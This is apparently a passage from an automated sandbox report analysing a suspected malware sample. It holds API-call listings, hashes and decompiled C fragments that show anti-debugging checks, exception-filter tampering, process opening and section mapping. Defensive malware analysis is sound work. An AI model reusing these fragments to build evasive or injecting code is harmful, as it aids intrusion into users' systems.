      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
      • String ID:
      • API String ID: 2579439406-0
      • Opcode ID: 36c744ffb8da7f9432cb87508bd69c5e1121cf6253b0b6fdce0ed901ad6ebddc
      • Instruction ID: 8ef743d73e543d6174986831e481aa5c8385d2e57cb0c867346c0250616e2954
      • Opcode Fuzzy Hash: 36c744ffb8da7f9432cb87508bd69c5e1121cf6253b0b6fdce0ed901ad6ebddc
      • Instruction Fuzzy Hash: 1B21E4719113589FDB20DFA5D8897CDBBB8BF08304F10412AE909AB251EBB496458F59
      APIs
      • IsDebuggerPresent.KERNEL32 ref: 00412B08
      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00412B1D
      • UnhandledExceptionFilter.KERNEL32(004181C4), ref: 00412B28
      • GetCurrentProcess.KERNEL32(C0000409), ref: 00412B44
      • TerminateProcess.KERNEL32(00000000), ref: 00412B4B
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
      • String ID:
      • API String ID: 2579439406-0
      • Opcode ID: cbeed38587537d900dccb379dc393c3de5331890d2107668f1d2024f85961387
      • Instruction ID: 311a2433788c888b2570000bb709f37abea71b1efbf1095dc2b51b401d63ab1f
      • Opcode Fuzzy Hash: cbeed38587537d900dccb379dc393c3de5331890d2107668f1d2024f85961387
      • Instruction Fuzzy Hash: A721D4B4500302AFC710DF19F985A897BB4FB08718F92A03AE409877B5E7B459858F5D
      C-Code - Quality: 58%
      			E004027AD(void* __ecx, char _a4) {
      				signed int _v8;
      				char _v12;
      				intOrPtr* _t12;
      				long _t14;
      
      				_t12 =  *0x40502c;
      				_v8 = _v8 & 0x00000000;
      				if(_t12 != 0) {
      					_v8 = _v8 & 0x00000000;
      					_t5 =  &_v12; // 0x402336
      					_t7 =  &_a4; // 0x402336
      					_v12 = 0x318;
      					_t14 =  *_t12( *_t7,  &_v8, 0, _t5, 0x3000, 0x40);
      					if(_t14 < 0) {
      						SetLastError(RtlNtStatusToDosError(_t14));
      						_v8 = _v8 & 0x00000000;
      					}
      				}
      				return _v8;
      			}








      APIs
      • RtlNtStatusToDosError.NTDLL ref: 004027E5
      • SetLastError.KERNEL32(00000000,?,?,?,00402336), ref: 004027EC
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Error$LastStatus
      • String ID: 6#@$6#@
      • API String ID: 4076355890-1222113149
      • Opcode ID: 53c7dc0b57a4ad390b981a2db64d8cbb6b77cf9fa09de91a4850e3f16a6c50e0
      • Instruction ID: 752d4f76ff22442f4c7c0650a08ed51d6ea4999d6a387b84b0daf2d8990a02ff
      • Opcode Fuzzy Hash: 53c7dc0b57a4ad390b981a2db64d8cbb6b77cf9fa09de91a4850e3f16a6c50e0
      • Instruction Fuzzy Hash: 34F0DAB1911209FBEB05CB95DE59B9E76BCAB14345F104058A700B61C0DBB4AB04DB68
      C-Code - Quality: 100%
      			E00401800(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
      				char _v5;
      				char _v7;
      				char _v17;
      				short _v24;
      				intOrPtr _v28;
      				char _v33;
      				char _v34;
      				signed int _v48;
      				intOrPtr _v52;
      				short _v56;
      				intOrPtr _v60;
      				signed short _v76;
      				intOrPtr _v80;
      				signed short _v92;
      				short _v96;
      				signed char _v101;
      				signed int _v112;
      				char _v113;
      				signed int _v120;
      				char _v121;
      				signed int _v140;
      				signed int _v145;
      				signed short _v152;
      				signed int _v153;
      				intOrPtr _v160;
      				signed short _v172;
      				intOrPtr _v176;
      				intOrPtr _v188;
      				intOrPtr _v196;
      				signed short _v200;
      				signed short _v208;
      				intOrPtr _v220;
      				char _v221;
      				intOrPtr _t140;
      				intOrPtr _t149;
      
      				_v33 = 0x26;
      				_v152 = 0xb;
      				_v101 = 4;
      				_v56 = 0x1d;
      				_v96 = 0x2c;
      				_v24 = 3;
      				_v196 = 0x25;
      				_v34 = 0x2c;
      				_v220 = 0;
      				while(_v220 < 0xf) {
      					_v7 = _v140 - _v80 + _v48 + (_v172 & 0x0000ffff) - _v48;
      					_v28 = 1 - _a12 - 0x16;
      					_t149 =  *0x42d034; // 0x0
      					_v121 = _v140 ^ 0x00000008 ^ _t149 + _a4 + (_v145 & 0x000000ff);
      					_v221 = 0x63;
      					_v5 = 0x00000056 - _a4 - (_v153 & 0x000000ff) +  *0x42d030 & 0x0000001a;
      					_v220 = _v220 + 1;
      				}
      				 *0x42c020 = (_v145 & 0x000000ff) + (_v200 & 0x0000ffff) ^  *0x42c020;
      				_v188 = (_v152 & 0x0000ffff) - _v120;
      				_v176 = _v120 - 0x7f;
      				_v208 = _v60 + _v140 - _v52 - 0x5b;
      				_v120 = _v48 & 0x0000001d;
      				_v17 = _v188 + _v120 - 0x00000031 ^ _v80 + _v160;
      				_v153 = _v48 + _v140 - 0x00000035 + _a4 & _v112;
      				_t140 =  *0x42d03c; // 0x0
      				_v153 = _a12 + _a12 + _v160 ^ _t140 - _v160;
      				_v24 = _v48 + 0x45;
      				_v113 = _v48 + _v140 + _v140 - _v160 + _v80;
      				_v208 = (_v208 & 0x0000ffff) - (_v101 & 0x000000ff) + _a8 + (_v92 & 0x0000ffff);
      				_v76 = _v76 & 0x0000ffff & 0x0000001e - _a8 + _v120;
      				return _v140;
      			}







































      Strings
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID:
      • String ID: %$&$,$,$c
      • API String ID: 0-1550213316
      • Opcode ID: 3fba230848996defcb1a6dd82a6496dd0d6758f63d3fb2d4a38a4e77f3bf999c
      • Instruction ID: 5cbce02fd3f4360d9f7adde614c3f2d91ffbcc962852d34a1898dbb7efe238c8
      • Opcode Fuzzy Hash: 3fba230848996defcb1a6dd82a6496dd0d6758f63d3fb2d4a38a4e77f3bf999c
      • Instruction Fuzzy Hash: 63512331D05268CFCB64CFA9C990BEDBBB1AF44308F04C2D9D449BB246DA345A99CF59
      C-Code - Quality: 100%
      			E00401B9B() {
      				void* _t1;
      				long _t3;
      				void* _t4;
      				long _t5;
      				void* _t6;
      				intOrPtr _t8;
      				void* _t12;
      
      				_t8 =  *0x405484; // 0x400000
      				_t1 = CreateEventA(0, 1, 0, 0);
      				 *0x405490 = _t1;
      				if(_t1 == 0) {
      					return GetLastError();
      				}
      				_t3 = GetVersion();
      				if(_t3 != 5) {
      					L4:
      					if(_t12 <= 0) {
      						_t4 = 0x32;
      						return _t4;
      					} else {
      						goto L5;
      					}
      				} else {
      					if(_t3 > 0) {
      						L5:
      						 *0x40547c = _t3;
      						_t5 = GetCurrentProcessId();
      						 *0x405478 = _t5;
      						 *0x405484 = _t8;
      						_t6 = OpenProcess(0x10047a, 0, _t5);
      						 *0x405474 = _t6;
      						if(_t6 == 0) {
      							 *0x405474 =  *0x405474 | 0xffffffff;
      						}
      						return 0;
      					} else {
      						_t12 = _t3 - _t3;
      						goto L4;
      					}
      				}
      			}











      APIs
      • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00401103,?,00000000), ref: 00401BAA
      • GetVersion.KERNEL32(?,00000000), ref: 00401BB9
      • GetCurrentProcessId.KERNEL32(?,00000000), ref: 00401BD0
      • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000000), ref: 00401BE9
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Process$CreateCurrentEventOpenVersion
      • String ID:
      • API String ID: 845504543-0
      • Opcode ID: 8f6ce72ff6f1d89e85702df2e4ee5ef1f61c458c50eb7c89673b9968cf0f0864
      • Instruction ID: b1ba45da2a836c28caf9fe751c5d1c8a0abfb3f3948d590c1bdbef6021fc2645
      • Opcode Fuzzy Hash: 8f6ce72ff6f1d89e85702df2e4ee5ef1f61c458c50eb7c89673b9968cf0f0864
      • Instruction Fuzzy Hash: 3DF04FB16846109EEB209F78BF09BDA3BA8E744B62F000136E754FA1F0D37458818F4C
      APIs
      • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413CC9
      • UnhandledExceptionFilter.KERNEL32(?), ref: 00413CD3
      • RtlUnwind.KERNEL32(?,00413CFC,00000000,00000000), ref: 00413CF7
        • Part of subcall function 0040ED95: GetModuleFileNameA.KERNEL32(00000000,00436231,00000104), ref: 0040EE2E
        • Part of subcall function 0040ED95: GetStdHandle.KERNEL32(000000F4), ref: 0040EEFE
        • Part of subcall function 0040ED95: WriteFile.KERNEL32(00000000,00000000,00000000), ref: 0040EF29
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ExceptionFileFilterUnhandled$HandleModuleNameUnwindWrite
      • String ID:
      • API String ID: 967269462-0
      • Opcode ID: 4f921be9e8fe3147b96b251c6e064c71450b92f8b3a1ba3c66902f2f68fa829c
      • Instruction ID: 90a89bf87272827b3b159eadd55355efd96bec79567511dedd2883a0d5093d69
      • Opcode Fuzzy Hash: 4f921be9e8fe3147b96b251c6e064c71450b92f8b3a1ba3c66902f2f68fa829c
      • Instruction Fuzzy Hash: 03317F71A0034C9ADB30DFA5EC45BCE7BB8FF09714F10402AF908AB291EB759645CB99
      C-Code - Quality: 65%
      			E00413BEE(intOrPtr __ebx, intOrPtr __edx, intOrPtr __edi, intOrPtr _a100, intOrPtr _a104, intOrPtr _a108, intOrPtr _a112, intOrPtr _a116, intOrPtr _a120, intOrPtr _a124, intOrPtr _a128, intOrPtr _a132, intOrPtr _a136, intOrPtr _a140, intOrPtr _a144, intOrPtr _a148, void* _a152, intOrPtr _a156, intOrPtr _a160, signed int _a676, char _a684) {
      				char _v40;
      				struct _EXCEPTION_POINTERS _v48;
      				intOrPtr _v116;
      				char _v128;
      				char _v684;
      				intOrPtr _v816;
      				void* __esi;
      				void* __ebp;
      				signed int _t36;
      				intOrPtr _t38;
      				void* _t39;
      				char* _t40;
      				intOrPtr _t50;
      				intOrPtr _t52;
      				intOrPtr _t53;
      				intOrPtr _t54;
      				char _t56;
      				signed int _t58;
      				void* _t61;
      				void* _t62;
      
      				_t54 = __edi;
      				_t53 = __edx;
      				_t50 = __ebx;
      				_t58 =  &_v684;
      				_t62 = _t61 - 0x328;
      				_t36 =  *0x42c4a0; // 0xe190ffa3
      				_a676 = _t36 ^ _t58;
      				_push(_t56);
      				if(( *0x42cbd0 & 0x00000001) != 0) {
      					E0040ED95(0xa);
      					_pop(_t52);
      				}
      				_t38 = E00411465();
      				_t65 = _t38;
      				if(_t38 != 0) {
      					_t38 = E00411472(_t50, _t54, _t56, _t65);
      					_t52 = 0x16;
      				}
      				if(( *0x42cbd0 & 0x00000002) != 0) {
      					_a136 = _t38;
      					_a132 = _t52;
      					_a128 = _t53;
      					_a124 = _t50;
      					_a120 = _t56;
      					_a116 = _t54;
      					_a160 = ss;
      					_a148 = cs;
      					_a112 = ds;
      					_a108 = es;
      					_a104 = fs;
      					_a100 = gs;
      					asm("pushfd");
      					_pop( *_t19);
      					_t56 = _a684;
      					_t40 =  &_a684;
      					_a156 = _t40;
      					_v40 = 0x10001;
      					_a144 = _t56;
      					_a140 =  *((intOrPtr*)(_t40 - 4));
      					E0040FE20(_t54,  &_v128, 0, 0x50);
      					_t62 = _t62 + 0xc;
      					_v48.ExceptionRecord =  &_v128;
      					_v128 = 0x40000015;
      					_v116 = _t56;
      					_v48.ContextRecord =  &_v40;
      					SetUnhandledExceptionFilter(0);
      					UnhandledExceptionFilter( &_v48);
      				}
      				_t39 = E0040D07D(3);
      				asm("int3");
      				asm("int3");
      				asm("int3");
      				asm("int3");
      				_push(_t58);
      				_push(_t50);
      				_push(_t56);
      				_push(_t54);
      				_push(_t62);
      				_push(0);
      				_push(0);
      				_push(0x413cfc);
      				_push(_v816);
      				L00416624();
      				return _t39;
      			}
























      APIs
      • SetUnhandledExceptionFilter.KERNEL32 ref: 00413CC9
      • UnhandledExceptionFilter.KERNEL32(?), ref: 00413CD3
      • RtlUnwind.KERNEL32(?,00413CFC,00000000,00000000), ref: 00413CF7
        • Part of subcall function 0040ED95: GetModuleFileNameA.KERNEL32(00000000,00436231,00000104,0040FA78,00000001,00000214), ref: 0040EE2E
        • Part of subcall function 0040ED95: _strlen.LIBCMT ref: 0040EE5F
        • Part of subcall function 0040ED95: _strlen.LIBCMT ref: 0040EE6C
        • Part of subcall function 0040ED95: GetStdHandle.KERNEL32(000000F4,00000001,00000001,00000000,76ECE046,00000003,0040EF61,000000FC,0040C732,00000001,00000000,00000000,?,004110A6,0040FA78,00000001), ref: 0040EEFE
        • Part of subcall function 0040ED95: _strlen.LIBCMT ref: 0040EF1F
        • Part of subcall function 0040ED95: WriteFile.KERNEL32 ref: 0040EF29
      Memory Dump Source
      • Source File: 00000001.00000001.2574848852.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
      • Associated: 00000001.00000001.2574309266.0000000000400000.00000002.sdmp
      • Associated: 00000001.00000001.2582924768.0000000000417000.00000002.sdmp
      • Associated: 00000001.00000001.2590538102.000000000042C000.00000004.sdmp
      • Associated: 00000001.00000001.2591421495.0000000000436000.00000004.sdmp
      • Associated: 00000001.00000001.2591956442.0000000000437000.00000002.sdmp
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_1_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: _strlen$ExceptionFileFilterUnhandled$HandleModuleNameUnwindWrite
      • String ID:
      • API String ID: 2569407725-0
      • Opcode ID: 8fbf7a16d2a44bbb6335bae5be489ab3ea3a19db2a12ac5c0f6e68ca4ba16b63
      • Instruction ID: 90a89bf87272827b3b159eadd55355efd96bec79567511dedd2883a0d5093d69
      • Opcode Fuzzy Hash: 8fbf7a16d2a44bbb6335bae5be489ab3ea3a19db2a12ac5c0f6e68ca4ba16b63
      • Instruction Fuzzy Hash: 03317F71A0034C9ADB30DFA5EC45BCE7BB8FF09714F10402AF908AB291EB759645CB99
      APIs
      • NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 002DE331
      • RtlNtStatusToDosError.NTDLL(00000000), ref: 002DE372
      • NtClose.NTDLL(?), ref: 002DE386
        • Part of subcall function 002DE297: NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002DE2C4
        • Part of subcall function 002DE297: RtlNtStatusToDosError.NTDLL(00000000), ref: 002DE2CB
      Memory Dump Source
      • Source File: 00000001.00000002.3011396965.00000000002DE000.00000040.sdmp, Offset: 002DE000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2de000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ErrorSectionStatus$CloseCreateView
      • String ID:
      • API String ID: 2017625107-0
      • Opcode ID: ae3832c6faef6a21357de7734a98af9dbdc63a7e4b65905de2955db71e83f5b2
      • Instruction ID: fb24a26b2aa95652a1d39d371ed6dfdbae6f05634206c3c73c02c81dc4029df3
      • Opcode Fuzzy Hash: ae3832c6faef6a21357de7734a98af9dbdc63a7e4b65905de2955db71e83f5b2
      • Instruction Fuzzy Hash: B0213C71910219AFCF11EFA8CC859EEBBB9FB48750F110526FA11F7250D7709A14CBA5
      APIs
      • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 002DE2C4
      • RtlNtStatusToDosError.NTDLL(00000000), ref: 002DE2CB
      Memory Dump Source
      • Source File: 00000001.00000002.3011396965.00000000002DE000.00000040.sdmp, Offset: 002DE000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2de000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: ErrorSectionStatusView
      • String ID:
      • API String ID: 1313840181-0
      • Opcode ID: c0b0cca16c72e3f69227371f17784503288c00ddcddb9ee3d3bdbe3c26c3f45e
      • Instruction ID: d64c79457ae150eb0a106f5442764b7f5bf4f8051d33ed88b86ad0a50613e610
      • Opcode Fuzzy Hash: c0b0cca16c72e3f69227371f17784503288c00ddcddb9ee3d3bdbe3c26c3f45e
      • Instruction Fuzzy Hash: 44E0C0B6910208FFDB059F94DD0ADDF7B7DEB44300F00856AB715A6150E6B0AA189B64
      C-Code - Quality: 58%
      			E0040276A(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
      				intOrPtr* _t5;
      				long _t6;
      				void* _t9;
      
      				_t5 =  *0x405028;
      				_t9 = 0;
      				if(_t5 == 0) {
      					_t6 = 0xc0000002;
      					goto L4;
      				} else {
      					_t6 =  *_t5(_a4, _a8, _a12, 0x318, _a16);
      					if(_t6 < 0) {
      						L4:
      						SetLastError(RtlNtStatusToDosError(_t6));
      					} else {
      						_t9 = 1;
      					}
      				}
      				return _t9;
      			}







      APIs
      • RtlNtStatusToDosError.NTDLL ref: 0040279A
      • SetLastError.KERNEL32(00000000,?,00000318,00000008), ref: 004027A1
      Memory Dump Source
      • Source File: 00000001.00000002.3011495595.0000000000400000.00000040.sdmp, Offset: 00400000, based on PE: true
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_400000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: Error$LastStatus
      • String ID:
      • API String ID: 4076355890-0
      • Opcode ID: c06b4d4ffea2e640578c3b661d3249466230bb319a2aafee2fe03219a48cdbff
      • Instruction ID: 619cf60adcc19383fff082a269bac3000d866fccb557d4ed25aad9d60f015b06
      • Opcode Fuzzy Hash: c06b4d4ffea2e640578c3b661d3249466230bb319a2aafee2fe03219a48cdbff
      • Instruction Fuzzy Hash: E5E08676204322EBD7014FE49E08E4BBE69AF98782F000835B741F31F1C678C8569BE5
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011253056.0000000000250000.00000040.sdmp, Offset: 00250000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_250000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID:
      • String ID: $a
      • API String ID: 0-206647194
      • Opcode ID: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
      • Instruction ID: 23c83684b5d56251109420ffff55496eec61416e142c87e616822649c2bcb8a5
      • Opcode Fuzzy Hash: 2b74b7560147f6a3171f96d9c91d11626458d92188a21795b354f158c7a4578d
      • Instruction Fuzzy Hash: 5BC186716183418FC724CF24C8D4A2AB7E1FF88716F15896DE98A9B352C770E859CF4A
      APIs
      Memory Dump Source
      • Source File: 00000001.00000002.3011358454.00000000002D1000.00000020.sdmp, Offset: 002D1000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_2d1000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID: memset
      • String ID:
      • API String ID: 2221118986-0
      • Opcode ID: c621025a64a93996d1d85dfdfbf29c8b79bd01e3c7741aae90d62d2e02bcd7eb
      • Instruction ID: a2f788310c4ee298eadcd6fe760f7503fb4a78392626ceccec26295ca41f87ca
      • Opcode Fuzzy Hash: c621025a64a93996d1d85dfdfbf29c8b79bd01e3c7741aae90d62d2e02bcd7eb
      • Instruction Fuzzy Hash: 9522847BE516169BDB08CA95CC805E9B3E3BBC832471F9179C919E3305EE797A0786C0
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID: 0-3916222277
      • Opcode ID: 73dfd7de476dc03c3a0bc7ecec83dd2ee081efb1183e876faf975e9413070d73
      • Instruction ID: 2d1c1fda648c1f10975837b91237ef28666af25bb28fe1228fba60b4b0f928a2
      • Opcode Fuzzy Hash: 73dfd7de476dc03c3a0bc7ecec83dd2ee081efb1183e876faf975e9413070d73
      • Instruction Fuzzy Hash: F402F872E105199BDF08CF68D8403EDB3B2FBD9365F25822ED926A72D0C7746A45CB84
      Strings
      Memory Dump Source
      • Source File: 00000001.00000002.3011514816.000000000040E000.00000020.sdmp, Offset: 0040E000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_40e000_zbetcheckin_tracker_propan.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID: 0-3916222277
      • Opcode ID: 8a9038f4292f5b1207dfd42d05664a8d5d717137d838deb8b609dcb433b41157
      • Instruction ID: ee01d1faeee44ef12e4e3cf103a29a5988aec0003df79e6e441c58099ca84b5c
      • Opcode Fuzzy Hash: 8a9038f4292f5b1207dfd42d05664a8d5d717137d838deb8b609dcb433b41157
      • Instruction Fuzzy Hash: 1702EB32E105199BDF04CF59D8403EDB7B2FBD8355F25C26ED926AB280C3746A86CB84
      C-Code - Quality: 92%
      			E00414449(signed int _a4, signed int* _a8) {
      				signed int _v8;
      				signed int _v12;
      				signed int _v16;
      				signed int _v20;
      				signed int _v24;
      				signed int _v28;
      				signed short _v32;
      				signed int _v36;
      				void* _v48;
      				signed short* _t231;
      				signed int _t236;
      				signed int _t239;
      				signed int _t243;
      				intOrPtr _t244;
      				intOrPtr _t245;
      				signed int _t248;
      				void* _t249;
      				signed int _t253;
      				intOrPtr _t254;
      				signed int _t256;
      				signed int _t258;
      				signed int _t261;
      				signed int _t265;
      				signed int _t268;
      				signed int _t273;
      				signed int _t277;
      				signed int _t280;
      				signed int _t281;
      				signed int _t285;
      				signed int _t286;
      				signed int _t289;
      				signed int* _t291;
      				signed int* _t293;
      				signed int* _t294;
      				signed int* _t296;
      				signed int _t297;
      				signed int _t301;
      				void* _t302;
      				signed char _t303;
      				signed int _t307;
      				signed int _t316;
      				void* _t317;
      				intOrPtr _t322;
      				signed short* _t324;
      				signed int _t331;
      				intOrPtr _t332;
      				signed int _t340;
      				signed int _t341;
      				void* _t342;
      				signed char _t343;
      				signed int _t345;
      				signed int _t346;
      				signed int _t353;
      				void* _t354;
      				signed int _t355;
      				signed int _t357;
      				signed int* _t359;
      				signed int _t360;
      				signed int* _t361;
      				void* _t362;
      				signed int _t365;
      				signed int* _t367;
      				signed int _t368;
      				signed int _t369;
      				signed int _t372;
      				signed int _t375;
      				signed int _t376;
      				signed int _t382;
      				signed int _t383;
      				signed int _t388;
      				signed int _t389;
      				signed int _t392;
      				signed int _t395;
      				signed int _t398;
      				signed int _t399;
      				signed int _t416;
      				signed int* _t421;
      				unsigned int _t422;
      				signed int _t427;
      				signed int _t430;
      				signed int _t431;
      				signed int _t434;
      				signed int _t437;
      				void* _t438;
      				intOrPtr _t447;
      				signed int _t448;
      				signed int _t451;
      				unsigned int _t456;
      				unsigned int _t465;
      				intOrPtr _t473;
      				signed int _t474;
      				unsigned int _t475;
      				signed int _t483;
      				signed int _t484;
      				signed int _t485;
      				signed int _t488;
      				void* _t493;
      				void* _t494;
      
      				_t231 = _a4;
      				_t297 = _t231[5] & 0x0000ffff;
      				_v24 = _t297 & 0x00008000;
      				_v36 = _t231[3];
      				_t285 = (_t297 & 0x00007fff) - 0x3fff;
      				_v32 = _t231[1];
      				_v28 = ( *_t231 & 0x0000ffff) << 0x10;
      				if(_t285 != 0xffffc001) {
      					_a4 = _a4 & 0x00000000;
      					asm("movsd");
      					asm("movsd");
      					asm("movsd");
      					_t447 =  *0x42cc04; // 0x18
      					_t448 = _t447 - 1;
      					_t17 = _t448 + 1; // 0x18
      					_t301 = _t17;
      					asm("cdq");
      					_t236 = _t301 + (_t369 & 0x0000001f) >> 5;
      					_t372 = _t301 & 0x8000001f;
      					__eflags = _t372;
      					_v20 = _t285;
      					_v16 = _t236;
      					if(_t372 < 0) {
      						_t372 = (_t372 - 0x00000001 | 0xffffffe0) + 1;
      						__eflags = _t372;
      					}
      					_t421 = _t493 + _t236 * 4 - 0x20;
      					_t302 = 0x1f;
      					_t303 = _t302 - _t372;
      					_t239 = 1 << _t303;
      					_v12 = _t303;
      					__eflags =  *_t421 & 1;
      					if(( *_t421 & 1) != 0) {
      						_t277 = _v16;
      						_t372 =  !((_t372 | 0xffffffff) << _t303);
      						__eflags =  *(_t493 + _t277 * 4 - 0x20) & _t372;
      						while(__eflags == 0) {
      							_t277 = _t277 + 1;
      							__eflags = _t277 - 3;
      							if(_t277 < 3) {
      								__eflags =  *(_t493 + _t277 * 4 - 0x20);
      								continue;
      							} else {
      							}
      							goto L25;
      						}
      						asm("cdq");
      						_t365 = 0x1f;
      						_t280 = _t448 + (_t372 & _t365) >> 5;
      						_t488 = _t448 & 0x8000001f;
      						__eflags = _t488;
      						if(_t488 < 0) {
      							_t488 = (_t488 - 0x00000001 | 0xffffffe0) + 1;
      							__eflags = _t488;
      						}
      						_v8 = _v8 & 0x00000000;
      						_t416 = 1 << _t365 - _t488;
      						_t367 = _t493 + _t280 * 4 - 0x20;
      						_a4 =  *_t367 + 1;
      						_t448 =  *_t367;
      						__eflags = _a4 - _t448;
      						if(_a4 < _t448) {
      							L22:
      							_v8 = 1;
      						} else {
      							__eflags = _a4 - _t416;
      							L21:
      							if(__eflags < 0) {
      								goto L22;
      							}
      						}
      						L23:
      						_t239 = _t280 - 1;
      						__eflags = _t239;
      						_t372 = _a4;
      						 *_t367 = _t372;
      						_t368 = _v8;
      						if(_t239 >= 0) {
      							__eflags = _t368;
      							if(_t368 != 0) {
      								_v8 = _v8 & 0x00000000;
      								_t367 = _t493 + _t239 * 4 - 0x20;
      								_t48 =  *_t367 + 1; // 0x1
      								_t448 = _t48;
      								__eflags = _t448 -  *_t367;
      								_a4 = _t448;
      								if(_t448 <  *_t367) {
      									goto L22;
      								} else {
      									__eflags = _t448 - 1;
      									goto L21;
      								}
      								goto L23;
      							}
      						}
      						_a4 = _t368;
      					}
      					L25:
      					 *_t421 =  *_t421 & (_t239 | 0xffffffff) << _v12;
      					_t243 = _v16 + 1;
      					__eflags = _t243 - 3;
      					if(_t243 < 3) {
      						_t362 = 3;
      						__eflags = 0;
      						memset(_t493 + _t243 * 4 - 0x20, 0, _t362 - _t243 << 2);
      						_t494 = _t494 + 0xc;
      					}
      					__eflags = _a4;
      					if(_a4 != 0) {
      						_t285 = _t285 + 1;
      						__eflags = _t285;
      					}
      					_t244 =  *0x42cc00; // 0xffffff81
      					__eflags = _t285 - _t244 -  *0x42cc04;
      					if(_t285 >= _t244 -  *0x42cc04) {
      						__eflags = _t285 - _t244;
      						if(_t285 > _t244) {
      							__eflags = _t285 -  *0x42cbfc; // 0x80
      							_t307 =  *0x42cc08; // 0x8
      							if(__eflags < 0) {
      								_t245 =  *0x42cc10; // 0x7f
      								_v36 = _v36 & 0x7fffffff;
      								_t286 = _t285 + _t245;
      								asm("cdq");
      								_t248 = _t307 + (_t372 & 0x0000001f) >> 5;
      								_t375 = _t307 & 0x8000001f;
      								__eflags = _t375;
      								if(_t375 < 0) {
      									_t375 = (_t375 - 0x00000001 | 0xffffffe0) + 1;
      									__eflags = _t375;
      								}
      								_v16 = _v16 & 0x00000000;
      								_a4 = _a4 & 0x00000000;
      								_v8 = 0x20;
      								_t197 =  &_v8;
      								 *_t197 = _v8 - _t375;
      								__eflags =  *_t197;
      								_t451 =  !((_t448 | 0xffffffff) << _t375);
      								do {
      									_t422 =  *(_t493 + _a4 * 4 - 0x20);
      									_v20 = _t422 & _t451;
      									 *(_t493 + _a4 * 4 - 0x20) = _t422 >> _t375 | _v16;
      									_a4 = _a4 + 1;
      									__eflags = _a4 - 3;
      									_v16 = _v20 << _v8;
      								} while (_a4 < 3);
      								_t376 = 2;
      								_t316 =  &_v28 - (_t248 << 2);
      								__eflags = _t316;
      								do {
      									__eflags = _t376 - _t248;
      									if(_t376 < _t248) {
      										_t219 = _t493 + _t376 * 4 - 0x20;
      										 *_t219 =  *(_t493 + _t376 * 4 - 0x20) & 0x00000000;
      										__eflags =  *_t219;
      									} else {
      										 *(_t493 + _t376 * 4 - 0x20) =  *_t316;
      									}
      									_t376 = _t376 - 1;
      									_t316 = _t316 - 4;
      									__eflags = _t376;
      								} while (_t376 >= 0);
      								_t249 = 0;
